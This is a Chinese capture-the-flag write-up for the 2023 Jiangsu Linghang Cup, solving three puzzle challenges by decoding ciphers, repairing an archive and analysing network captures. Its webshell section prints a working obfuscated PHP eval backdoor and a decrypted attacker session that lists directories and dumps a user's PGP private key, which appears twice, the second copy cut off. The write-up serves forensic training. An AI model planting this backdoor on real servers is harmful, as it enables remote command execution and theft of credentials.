2023 江苏领航杯部分wp
misc
五彩缤纷
博客记过:https://byxs20.github.io/posts/10343.html#52-Hexahue
对照解密出:JUSTKICKURASS
在线网站:https://www.geocachingtoolbox.com/index.php?lang=en&page=hexahue
加上flag前缀"CnHongKe" 即为答案 CnHongKe{JUSTKICKURASS}
四重奏
打开附件看010
发现rar文件没有文件头,我们修复一下,补上rar的文件头
补上文件头后发现压缩包能解压了
我们打开数据包看一下,追踪tcp流发现secret
0x64,0x47,0x68,0x70,0x63,0x31,0x39,0x70,0x63,0x31,0x39,0x77,0x59,0x58,0x4e,0x7a,0x64,0x32,0x52,0x66,0x4e,0x6a,0x46,0x69,0x59,0x6a,0x59,0x33,0x4e,0x6a,0x6b,0x78,0x5a,0x6d,0x46,0x6b,0x59,0x7a,0x42,0x6b,0x4d,0x41,0x3d,0x3d
===>HEX
dGhpc19pc19wYXNzd2RfNjFiYjY3NjkxZmFkYzBkMA==
===>base64
this_is_passwd_61bb67691fadc0d0
拿到的是个密码,我们看另外一个文件 .vrea
使用VreaCrypt工具进行解密挂载
拿到flag文件
🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅🤣👉🏎🌿🍴👌🍍🖐🍴🚫✅😇🌿📮📂🌊🦓☺👁🎈🚰✖💵🌪🚹☂🚫👁🐅🐘🌊🌿✉🐅💵⌨🍴😁🚫🌊😇🚨☀🐅🍌🌉💵👉☃⌨😂🌉🍍🍎📮🖐😇🦓🌏🚨☂🌪👣🏹🛩📮☀☀👁🍎👉💵😡💧😀🗒🗒
===》emojo-aes https://aghorler.github.io/emoji-aes/
901915893b6aaf7211248f2e70569484
加上flag头
CnHongKe{901915893b6aaf7211248f2e70569484}
webshell
一个数据包,查看tcp流
phar反序列化,我们导出保存为 1.phar,或者使用在线网站:http://unphar.com/cn
<?php
echo file_get_contents("phar://1.phar/x")
?>
<?php
eval('$k="4297f44b";$kh="13955235245b";$kf="2497399d7a93";$p="jSuJBZSb72ybWzJ0";
function x($t,$k){
$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t[$i]^$k[$j];
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}');
稍微格式化一下
<?php
$k = "4297f44b";
$kh = "13955235245b";
$kf = "2497399d7a93";
$p = "jSuJBZSb72ybWzJ0";
function encode($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l; ) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$o .= $t[$i] ^ $k[$j];
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
@ob_start();
@eval(@gzuncompress(@encode(@base64_decode($m[1]), $k)));
$o = @ob_get_contents();
@ob_end_clean();
$r = @base64_encode(@encode(@gzcompress($o), $k));
print("$p$kh$r$kf");
}
需要注意要写一个 base64
填补的代码,不然python的b64decode解不开,会出现报错
虽然我们不知道请求包的加密过程,但是多看一些,可以发现固定的 **13955235245b
+ baseStr + 2497399d7a93
,所以正则表达式匹配再加解base64就好了
import os
import re
import zlib
import base64
from FlowAnalyzer import FlowAnalyzer
key = b"4297f44b"
def decode(t):
data = [t[i] ^ key[i%len(key)] for i in range(len(t))]
return zlib.decompress(bytes(data))
def b64Padding(line):
missing_padding = len(line) % 4
if missing_padding != 0:
line += b"=" * (4 - missing_padding)
return line
if __name__ == '__main__':
baseDir = os.path.dirname(os.path.abspath(__file__))
flowPath = os.path.join(baseDir, "backdoor.pcapng")
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
with open("dec.txt", "w", encoding="utf-8") as f:
for count, dic in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
response_num, file_data = dic['response']
if file_data.startswith(b"jSuJBZSb72ybWzJ013955235245b"):
file_data = file_data[28:-12]
dec = decode(base64.b64decode(file_data))
request = dic.get("request")
if not request:
continue
request_num, file_data = request
r = re.findall(b"13955235245b(.*?)2497399d7a93", file_data)[0]
file_data = decode(base64.b64decode(b64Padding(r)))
f.write(f"序号: {request_num}请求包:\n{file_data.decode()}\n")
f.write(f"序号: {response_num}返回包:\n{dec.decode()}" + "\n" + "*" * 50 + "\n")
序号: 3541请求包:
echo(77515);
序号: 3544返回包:
77515
**************************************************
序号: 3554请求包:
@error_reporting(0);@system('echo 23640');
序号: 3557返回包:
23640
**************************************************
序号: 3567请求包:
@error_reporting(0);print(@gethostname());
序号: 3570返回包:
kali
**************************************************
序号: 3580请求包:
@error_reporting(0);
if(is_callable('posix_getpwuid')&&is_callable('posix_geteuid')) {
$u=@posix_getpwuid(@posix_geteuid());
if($u){
$u=$u['name'];
} else {
$u=getenv('username');
}
print($u);
}
序号: 3583返回包:
www-data
**************************************************
序号: 3593请求包:
@error_reporting(0);@chdir('.')&&print(@getcwd());
序号: 3596返回包:
/var/www/html
**************************************************
序号: 3606请求包:
chdir('/var/www/html');@error_reporting(0);@system('pwd 2>&1');
序号: 3609返回包:
/var/www/html
**************************************************
序号: 3686请求包:
chdir('/var/www/html');@error_reporting(0);@chdir('/home')&&print(@getcwd());
序号: 3689返回包:
/home
**************************************************
序号: 3732请求包:
chdir('/home');@error_reporting(0);@system('ls -al 2>&1');
序号: 3735返回包:
total 20
drwxr-xr-x 5 root root 4096 Aug 1 07:54 .
drwxr-xr-x 19 root root 4096 Sep 27 2022 ..
drwxr-xr-x 15 kali kali 4096 Feb 15 02:01 kali
drwxr-xr-x 3 ssor ssor 4096 Aug 1 08:20 ssor
drwxr-xr-x 2 root root 4096 Aug 1 07:54 xela
**************************************************
序号: 3804请求包:
chdir('/home');@error_reporting(0);@chdir('ssor')&&print(@getcwd());
序号: 3807返回包:
/home/ssor
**************************************************
序号: 3836请求包:
chdir('/home/ssor');@error_reporting(0);@system('ls -al 2>&1');
序号: 3839返回包:
total 24
drwxr-xr-x 3 ssor ssor 4096 Aug 1 08:20 .
drwxr-xr-x 5 root root 4096 Aug 1 07:54 ..
drwx------ 3 ssor ssor 4096 Aug 1 08:15 .gnupg
-rw-r--r-- 1 ssor ssor 756 Aug 1 08:06 flag-cipher.txt
-rw-r--r-- 1 ssor ssor 5192 Aug 1 08:14 private-file.key
**************************************************
序号: 5973请求包:
chdir('/home/ssor');@error_reporting(0);@system('cat flag-cipher.txt 2>&1');
序号: 5976返回包:
-----BEGIN PGP MESSAGE-----
hQGMA6wUH1ZtpnvJAQwA3A8G5cCfvajJ7Uyf3/Y7kIkV7pTjJ7JGzc0CBmfHgP0c
qdpyZE8uXUacgcneb5upPg7IgfzeGBLJQYFioH7yKwlrek3RNSOmfe6tGtMvHmKL
54JJmpqkLZe9NToYTBpfTn4ksPc1cQzkS3iMt7VqJ9/fzvdLFQJtf5k9qE30GLkm
Nsr0HxS6ebQLxaIMGkQWMlUrzpLc0I5CS6Vol9uCkPgY1UpnpZ+bD9NWlX6XvZ5L
cX1SJBogMTHCytn5ugpt01AsDtgctRDTpqy2WTwrJ3rdz7V/v5ujaQHLtOAjg6mW
1wgTrZAqYAo70OjR0204FOHZFPsWDrlLYi6YHXXZZuxrzJz2jze13msIgfNu6cIj
gaGBENChQpQCKpkQcybnjvfVumukAODze8dJhqxkFnvm97X5X5Svxctch9Taebqc
wgsbxEuveouXRqIe0XNQIHiCc/YbG+s+dAa0Feajs0tvFynmTn9CT3uQGVHNtYZy
5DxNucUHKUQR/hW7aPio0m4BPSapvQlx3fJQ0Mnudim50wimxKExH6Lh5gE46edy
deuXuhPurHiuZYB868x6Wcq1VeXkZyWZRa2+AZUZ1RE1J5+6Li0o+iIXsJ1Che0x
x05QYR/6zXhHNV7aRZ6kWacJNwgXPKTG07ONzhYhew==
=omaY
-----END PGP MESSAGE-----
**************************************************
序号: 6066请求包:
chdir('/home/ssor');@error_reporting(0);@system('cat private-file.key 2>&1');
序号: 6069返回包:
-----BEGIN PGP PRIVATE KEY BLOCK-----
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
=MkMD
-----END PGP PRIVATE KEY BLOCK-----
**************************************************
序号: 6306请求包:
chdir('/home/ssor');@error_reporting(0);@system('php -v 2>&1');
序号: 6308返回包:
PHP 8.1.5 (cli) (built: May 16 2022 17:15:25) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.1.5, Copyright (c) Zend Technologies
with Zend OPcache v8.1.5, Copyright (c), by Zend Technologies
**************************************************
序号: 6425请求包:
chdir('/home/ssor');@error_reporting(0);@system('ps -eaf|grep gpg 2>&1');
序号: 6430返回包:
ssor 378309 1 0 08:01 ? 00:00:00 gpg-agent --homedir /home/ssor/.gnupg --use-standard-socket --daemon
root 378356 864 0 08:03 ? 00:00:06 /usr/bin/gpg-agent --supervised
www-data 379905 379804 0 08:33 ? 00:00:00 sh -c ps -eaf|grep gpg 2>&1
www-data 379907 379905 0 08:33 ? 00:00:00 grep gpg
**************************************************
序号: 6492请求包:
chdir('/home/ssor');@error_reporting(0);@system('exit 2>&1');
序号: 6495返回包:
**************************************************
-----BEGIN PGP MESSAGE-----
hQGMA6wUH1ZtpnvJAQwA3A8G5cCfvajJ7Uyf3/Y7kIkV7pTjJ7JGzc0CBmfHgP0c
qdpyZE8uXUacgcneb5upPg7IgfzeGBLJQYFioH7yKwlrek3RNSOmfe6tGtMvHmKL
54JJmpqkLZe9NToYTBpfTn4ksPc1cQzkS3iMt7VqJ9/fzvdLFQJtf5k9qE30GLkm
Nsr0HxS6ebQLxaIMGkQWMlUrzpLc0I5CS6Vol9uCkPgY1UpnpZ+bD9NWlX6XvZ5L
cX1SJBogMTHCytn5ugpt01AsDtgctRDTpqy2WTwrJ3rdz7V/v5ujaQHLtOAjg6mW
1wgTrZAqYAo70OjR0204FOHZFPsWDrlLYi6YHXXZZuxrzJz2jze13msIgfNu6cIj
gaGBENChQpQCKpkQcybnjvfVumukAODze8dJhqxkFnvm97X5X5Svxctch9Taebqc
wgsbxEuveouXRqIe0XNQIHiCc/YbG+s+dAa0Feajs0tvFynmTn9CT3uQGVHNtYZy
5DxNucUHKUQR/hW7aPio0m4BPSapvQlx3fJQ0Mnudim50wimxKExH6Lh5gE46edy
deuXuhPurHiuZYB868x6Wcq1VeXkZyWZRa2+AZUZ1RE1J5+6Li0o+iIXsJ1Che0x
x05QYR/6zXhHNV7aRZ6kWacJNwgXPKTG07ONzhYhew==
=omaY
-----END PGP MESSAGE-----
-----BEGIN PGP PRIVATE KEY BLOCK-----
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
